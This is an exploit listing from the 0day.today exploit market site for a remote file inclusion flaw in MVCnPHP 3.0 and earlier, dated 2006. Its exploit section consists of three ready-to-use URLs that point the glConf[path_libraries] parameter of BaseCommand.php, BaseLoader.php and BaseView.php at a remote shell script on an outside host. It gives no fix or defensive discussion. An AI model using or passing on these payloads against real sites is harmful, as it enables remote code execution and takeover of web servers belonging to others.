[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MVCnPHP <= 3.0 glConf[path_libraries] Remote Include Vulnerabilities

Author
Drago84
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-684
Category
web applications
Date add
09-08-2006
Platform
unsorted
====================================================================
MVCnPHP <= 3.0 glConf[path_libraries] Remote Include Vulnerabilities
====================================================================



MVCnPHP Remote File Inclusion

############ToXiC CrEw###############

Bug Found by Drago84


Page Affect:
BaseCommand.php
BaseLoader.php
BaseView.php

ExP:
http://www.sito.com/dir_mvcnphp/BaseCommand.php?glConf[path_libraries]=http://evalsite.com/shell.php
http://www.sito.com/dir_mvcnphp/BaseLoader.php?glConf[path_libraries]=http://evalsite.com/shell.php
http://www.sito.com/dir_mvcnphp/BaseView.php?glConf[path_libraries]=http://evalsite.com/shell.php



#  0day.today [2024-12-25]  #